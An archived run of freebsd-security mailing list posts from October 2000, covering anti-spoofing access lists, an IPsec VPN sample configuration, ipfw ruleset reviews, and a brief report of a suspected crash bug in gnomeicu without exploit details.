0,3,4,8,11 /sbin/ipfw add 9900 deny log icmp from any to any ## kernel default = allow This, however, lacks some filters recommended by other organizations (for the IOS/PIX literate): Recommended by SANS: access-list 150 deny ip 0.0.0.0 0.255.255.255 any access-list 150 deny ip 10.0.0.0 0.255.255.255 any access-list 150 deny ip 127.0.0.0 0.255.255.255 any access-list 150 deny ip 169.254.0.0 0.0.255.255 any access-list 150 deny ip 172.16.0.0 0.15.255.255 any access-list 150 deny ip 192.0.2.0 0.0.0.255 any access-list 150 deny ip 192.168.0.0 0.0.255.255 any access-list 150 deny ip 224.0.0.0 15.255.255.255 any access-list 150 deny ip 240.0.0.0 7.255.255.255 any access-list 150 deny ip 248.0.0.0 7.255.255.255 any access-list 150 deny ip 255.255.255.255 0.0.0.0 any Recommended by Paul Vixie: access-list 100 deny ip host 0.0.0.0 any access-list 100 deny ip 127.0.0.0 0.255.255.255 255.0.0.0 0.255.255.255 access-list 100 deny ip 10.0.0.0 0.255.255.255 255.0.0.0 0.255.255.255 access-list 100 deny ip 172.16.0.0 0.15.255.255 255.240.0.0 0.15.255.255 access-list 100 deny ip 192.168.0.0 0.0.255.255 255.255.0.0 0.0.255.255 access-list 100 deny ip 192.0.2.0 0.0.0.255 255.255.255.0 0.0.0.255 access-list 100 deny ip 128.0.0.0 0.0.255.255 255.255.0.0 0.0.255.255 access-list 100 deny ip 191.255.0.0 0.0.255.255 255.255.0.0 0.0.255.255 access-list 100 deny ip 192.0.0.0 0.0.0.255 255.255.255.0 0.0.0.255 access-list 100 deny ip 223.255.255.0 0.0.0.255 255.255.255.0 0.0.0.255 access-list 100 deny ip 224.0.0.0 31.255.255.255 224.0.0.0 31.255.255.255 access-list 100 deny ip any 255.255.255.128 0.0.0.127 access-list 100 permit ip any any -- Roger Marquis Roble Systems Consulting http://www.roble.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 26 19:15:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id D963737B4CF for ; Thu, 26 Oct 2000 19:15:39 -0700 (PDT) Received: (qmail 10489 invoked by uid 0); 27 Oct 2000 02:15:38 -0000 Received: from p3ee2160d.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.13) by mail.gmx.net with SMTP; 27 Oct 2000 02:15:38 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id XAA23115 for freebsd-security@FreeBSD.org; Thu, 26 Oct 2000 23:51:37 +0200 Date: Thu, 26 Oct 2000 23:51:37 +0200 From: Gerhard Sittig To: freebsd-security@FreeBSD.org Subject: Re: ports/22316: [PATCH] samba port in a jail(2) environment Message-ID: <20001026235137.Y25237@speedy.gsinet> Mail-Followup-To: freebsd-security@FreeBSD.org References: <20001026205458.U25237@speedy.gsinet> <200010261920.MAA92910@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <200010261920.MAA92910@freefall.freebsd.org>; from gnats-admin@FreeBSD.org on Thu, Oct 26, 2000 at 12:20:02PM -0700 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is not really a security related posting in its strict sense. But I understand that security aware admins will most probably experience the same problem since it's bound to employing jail(2) - and of course FreeBSD for the important machines :) - for public and internal servers. That's why I would like to attract your attention, direct it towards http://www.freebsd.org/cgi/query-pr.cgi?pr=22316 and invite you to discuss the topic -- preferrably via PM or as a f'up to the PR, definitely not in the -security list unless it's plain wrong from a security POV what I did there to "solve" the problem. Unfortunately I'm not subscribed to -ports nor do I enjoy searching the lists via the web interface (there are soo many checkboxes for the many lists and I don't want to check too many to avoid false positives) -- this means searching does happen as problems arise, but not on a regular basis for casual reading. virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 26 20:44: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail3.mx.voyager.net (unknown [216.93.66.202]) by hub.freebsd.org (Postfix) with ESMTP id 9EB9037B479 for ; Thu, 26 Oct 2000 20:44:05 -0700 (PDT) Received: from thunder.voyager.net (net-216-93-125-061.hcv.com [216.93.125.61]) by mail3.mx.voyager.net (8.10.2/8.10.2) with ESMTP id e9R3i2423576; Thu, 26 Oct 2000 23:44:02 -0400 (EDT) Message-Id: <5.0.0.25.2.20001026234133.02b0bc30@pop.voyager.net> X-Sender: mhagerty@pop.voyager.net X-Mailer: QUALCOMM Windows Eudora Version 5.0 Date: Thu, 26 Oct 2000 23:43:59 -0400 To: Mike Tancsa , Matthew Hagerty , freebsd-security@FreeBSD.ORG From: Matthew Hagerty Subject: Re: IPsec requires FreeBSD-4.?? In-Reply-To: <4.2.2.20001025194015.04b93008@mail.sentex.net> References: <5.0.0.25.2.20001025174629.02b0fbd0@pop3.venux.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks for the info, however I am still not having any luck. Should the configuration you give below work if NAT is taking place on this machine as well? Also, are there any pointers as to how I can troubleshoot this problem, check where the communication stops, etc? Thanks, Matthew At 07:44 PM 10/25/00 -0400, Mike Tancsa wrote: >At 06:33 PM 10/25/2000 -0400, Matthew Hagerty wrote: >>Greetings, >> >>I am trying desperately to get a simple network-to-network VPN working >>with FreeBSD. I am having no luck and would like to know what version of >>4.x I need? I am currently using 4.0 release on both sides. Is that >>going to work or do I need to upgrade to 4.1.1 or something? > >It certainly is easier with 4.1.1 as you can use the racoon port. Here is >a quick sample config that will work with racoon out of the box > >This assumed that 172.16.1.1 and 192.168.1.1 are your public NON RFC 1918 >space that is publically >routed > > > >#!/bin/sh >#Ottawa config >ifconfig lo0 10.1.2.1 netmask 255.255.255.0 alias >gifconfig gif0 172.16.1.1 192.168.1.1 >ifconfig gif0 inet 10.1.2.1 10.1.1.1 netmask 255.255.255.0 >setkey -FP >setkey -F >setkey -c <spdadd 10.1.2.0/24 10.1.1.0/24 any -P out ipsec >esp/tunnel/172.16.1.1-192.168.1.1/require; >spdadd 10.1.1.0/24 10.1.2.0/24 any -P in ipsec >esp/tunnel/192.168.1.1-172.16.1.1/require; >EOF >#!/bin/sh >#Toronto config >ifconfig lo0 10.1.1.1 netmask 255.255.255.0 alias >gifconfig gif0 192.168.1.1 172.16.1.1 >ifconfig gif0 inet 10.1.1.1 10.1.2.1 netmask 255.255.255.0 >setkey -FP >setkey -F >setkey -c <spdadd 10.1.1.0/24 10.1.2.0/24 any -P out ipsec >esp/tunnel/192.168.1.1-172.16.1.1/require; >spdadd 10.1.2.0/24 10.1.1.0/24 any -P in ipsec >esp/tunnel/172.16.1.1-192.168.1.1/require; >EOF >And Presto! We have a secure VPN that is tunneled! > >Toronto# ping 10.1.2.1 >PING 10.1.2.1 (10.1.2.1): 56 data bytes >64 bytes from 10.1.2.1: icmp_seq=1 ttl=255 time=1.743 ms >64 bytes from 10.1.2.1: icmp_seq=2 ttl=255 time=1.746 ms >64 bytes from 10.1.2.1: icmp_seq=3 ttl=255 time=1.739 ms >64 bytes from 10.1.2.1: icmp_seq=4 ttl=255 time=1.610 ms >^C >--- 10.1.2.1 ping statistics --- >5 packets transmitted, 4 packets received, 20% packet loss >round-trip min/avg/max/stddev = 1.610/1.710/1.746/0.058 ms >Toronto# traceroute 10.1.2.1 >traceroute to 10.1.2.1 (10.1.2.1), 30 hops max, 40 byte packets > 1 10.1.2.1 (10.1.2.1) 1.363 ms 1.222 ms 1.183 ms >Toronto# telnet 10.1.2.1 >Trying 10.1.2.1... >Connected to 10.1.2.1. >Escape character is '^]'. > > > > > > > >>Also, while I'm here, this is the whole procedure I'm using (that does >>not seem to be working.) Is there something wrong with this? >> >>In the kernel I added these and recompiled: >> >>options IPSEC >>options IPSEC_ESP > >Looks good to me. > > >-------------------------------------------------------------------- >Mike Tancsa, tel +1 519 651 3400 >Network Administration, mike@sentex.net >Sentex Communications www.sentex.net >Cambridge, Ontario Canada www.sentex.net/mike > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 27 12:57:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id C619037B479 for ; Fri, 27 Oct 2000 12:57:30 -0700 (PDT) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.1/8.9.3) with ESMTP id e9RJvK456512 for ; Fri, 27 Oct 2000 12:57:21 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com) To: security@freebsd.org Subject: For those of you who were curious to know about Mark's day job... Date: Fri, 27 Oct 2000 12:57:20 -0700 Message-ID: <56508.972676640@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org http://www.usatoday.com/life/cyber/tech/cti726.htm :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 27 16:21:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from virtual.sysadmin-inc.com (lists.sysadmin-inc.com [209.16.228.140]) by hub.freebsd.org (Postfix) with ESMTP id 342B637B479 for ; Fri, 27 Oct 2000 16:21:12 -0700 (PDT) Received: from 98wkst ([10.10.1.71]) by virtual.sysadmin-inc.com (8.9.1/8.9.1) with SMTP id TAA12038 for ; Fri, 27 Oct 2000 19:21:07 -0400 Reply-To: From: "Peter Brezny" To: Subject: input on ipfw ruleset desired Date: Fri, 27 Oct 2000 19:21:11 -0400 Message-ID: <000d01c0406c$98a88340$47010a0a@fire.sysadmininc.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello everyone, if you have the time, please have a look at the ruleset below and let me know if i've missed something. I want to protect an internal network with this. If there is any tweaking that could be done to tighten it up or make it more efficient, i'd welcome the input. Thanks for your comments. Peter Brezny SysAdmin Services Inc. a.b.c.d = external ip w.x.y.z/24 = private inside ip range oif = outside interface iif = inside interface divert ip from any to any via oif check-state allow ip from a.b.c.d to any keep-state out xmit oif allow ip from w.x.y.z/24 to any keep-state in recv iif allow tcp from NS1 to a.b.c.d 53 keep-state allow tcp from any to a.b.c.d 22,25,80,443 keep-state deny log logamount 50 ip from any to any deny ip from any to any To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 27 17: 3:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailgw3.netvision.net.il (mailgw3.netvision.net.il [194.90.1.11]) by hub.freebsd.org (Postfix) with ESMTP id 873DF37B479 for ; Fri, 27 Oct 2000 17:03:16 -0700 (PDT) Received: from alchemy.oven.org (ras1-p101.hfa.netvision.net.il [62.0.145.101]) by mailgw3.netvision.net.il (8.9.3/8.9.3) with ESMTP id CAA29205 for ; Sat, 28 Oct 2000 02:02:20 +0200 (IST) Received: (from mapc@localhost) by alchemy.oven.org (8.11.0/8.11.0) id e9S03xF61660 for freebsd-security@freebsd.org; Sat, 28 Oct 2000 02:03:59 +0200 (IST) (envelope-from mapc) Date: Sat, 28 Oct 2000 02:03:59 +0200 From: Roman Shterenzon To: freebsd-security@freebsd.org Subject: [roman@xpert.com: Remote buffer overflow in gnomeicu 0.93] Message-ID: <20001028020359.A61199@alchemy.oven.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ----- Forwarded message from Roman Shterenzon ----- Date: Sat, 28 Oct 2000 00:46:08 +0200 From: Roman Shterenzon To: nectar@freebsd.org, ports@freebsd.org, jwise@pathwaynet.com Subject: Remote buffer overflow in gnomeicu 0.93 User-Agent: Mutt/1.2.5i Hi, Yesterday, running sockstat I noticed that openicu listens on TCP port 4000. I was curious so I fed it with some zeroes from /dev/zero, and, it crashed like a charm. I'm suspecting buffer overflow which may allow an intruder to receive a shell on victim's machine. Looking at code advises that the port can be chosen from 4000-4100 range. I believe it needs to be checked and the port marked as FORBIDDEN meanwhile. Sorry if it's false alarm. --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] ----- End forwarded message ----- --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 27 19:14:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 03B9237B4CF for ; Fri, 27 Oct 2000 19:14:20 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Fri, 27 Oct 2000 19:12:55 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e9S2EE244330; Fri, 27 Oct 2000 19:14:14 -0700 (PDT) (envelope-from cjc) Date: Fri, 27 Oct 2000 19:14:14 -0700 From: "Crist J . Clark" To: Peter Brezny Cc: freebsd-security@FreeBSD.ORG Subject: Re: input on ipfw ruleset desired Message-ID: <20001027191414.C75251@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <000d01c0406c$98a88340$47010a0a@fire.sysadmininc.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <000d01c0406c$98a88340$47010a0a@fire.sysadmininc.com>; from peter@sysadmin-inc.com on Fri, Oct 27, 2000 at 07:21:11PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Oct 27, 2000 at 07:21:11PM -0400, Peter Brezny wrote: > Hello everyone, > > if you have the time, please have a look at the ruleset below and let me > know if i've missed something. I want to protect an internal network with > this. If there is any tweaking that could be done to tighten it up or make > it more efficient, i'd welcome the input. > > Thanks for your comments. Yes, I have more remarks. First, I hope you left some things out. If not, you've broken your loopback. That is not a Good Thing. Second, your gateway cannot talk directly to the internal machines, bug or feature (although it can respond to sessions they initiate)? Also, you did not mention natd before. Rather than just let spoofs fall through the rules to the default deny, I like to kill them before they reach natd. They could potentially confuse the translation table and the very clever attacker could possibly get natd to modify the packets so they pass later rules. > a.b.c.d = external ip > w.x.y.z/24 = private inside ip range > oif = outside interface > iif = inside interface # Let loopback work pass all from any to any via lo0 # Stop loopback spoofs up front, shouldn't be needed, but does not hurt deny log all from any to 127.0.0.0/8 # Stop spoofs from hitting the divert rule # Note that this next rule might make noise in the logs when you hear # your own broadcasts deny log ip from a.b.c.d to any recv via oif deny log ip from w.x.y.z/24 to any recv via oif > divert ip from any to any via oif > check-state > allow ip from a.b.c.d to any keep-state out xmit oif > allow ip from w.x.y.z/24 to any keep-state in recv iif > allow tcp from NS1 to a.b.c.d 53 keep-state > allow tcp from any to a.b.c.d 22,25,80,443 keep-state > deny log logamount 50 ip from any to any > deny ip from any to any A final note, 50 is not going to be enough for any real-world network. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 28 15:20:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from digitaldaemon.com (digitaldaemon.com [63.105.9.34]) by hub.freebsd.org (Postfix) with SMTP id A009D37B479 for ; Sat, 28 Oct 2000 15:20:40 -0700 (PDT) Received: (qmail 27262 invoked from network); 28 Oct 2000 22:18:10 -0000 Received: from unknown (HELO smartsoft.cc) (192.168.0.73) by digitaldaemon.com with SMTP; 28 Oct 2000 22:18:10 -0000 Message-ID: <39FB50F6.10AF59D@smartsoft.cc> Date: Sat, 28 Oct 2000 18:19:34 -0400 From: Jan Knepper Organization: Smartsoft, LLC X-Mailer: Mozilla 4.76 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: FreeBSD Security Subject: ipfw reference Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I have setup machine to host virtual domains, do HTTP, SMTP and FTP for those domains. It also runs DNS. I have configured ipfw, but wondered if anyone around here would know a very good ipfw reference with examples. I have read through the manual pages a couple of times and have something setup that works, but I am far from sure how effective it protects the system if it does at all. Thanks! Jan -- Jan Knepper Smartsoft, LLC 88 Petersburg Road Petersburg, NJ 08270 U.S.A. http://www.smartsoft.cc/ http://www.mp3.com/pianoprincess Phone : 609-628-4260 FAX : 609-628-1267 FAX : 303-845-6415 http://www.fax4free.com/ Phone : 020-873-3837 http://www.xoip.nl/ (Dutch) FAX : 020-873-3837 http://www.xoip.nl/ (Dutch) In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message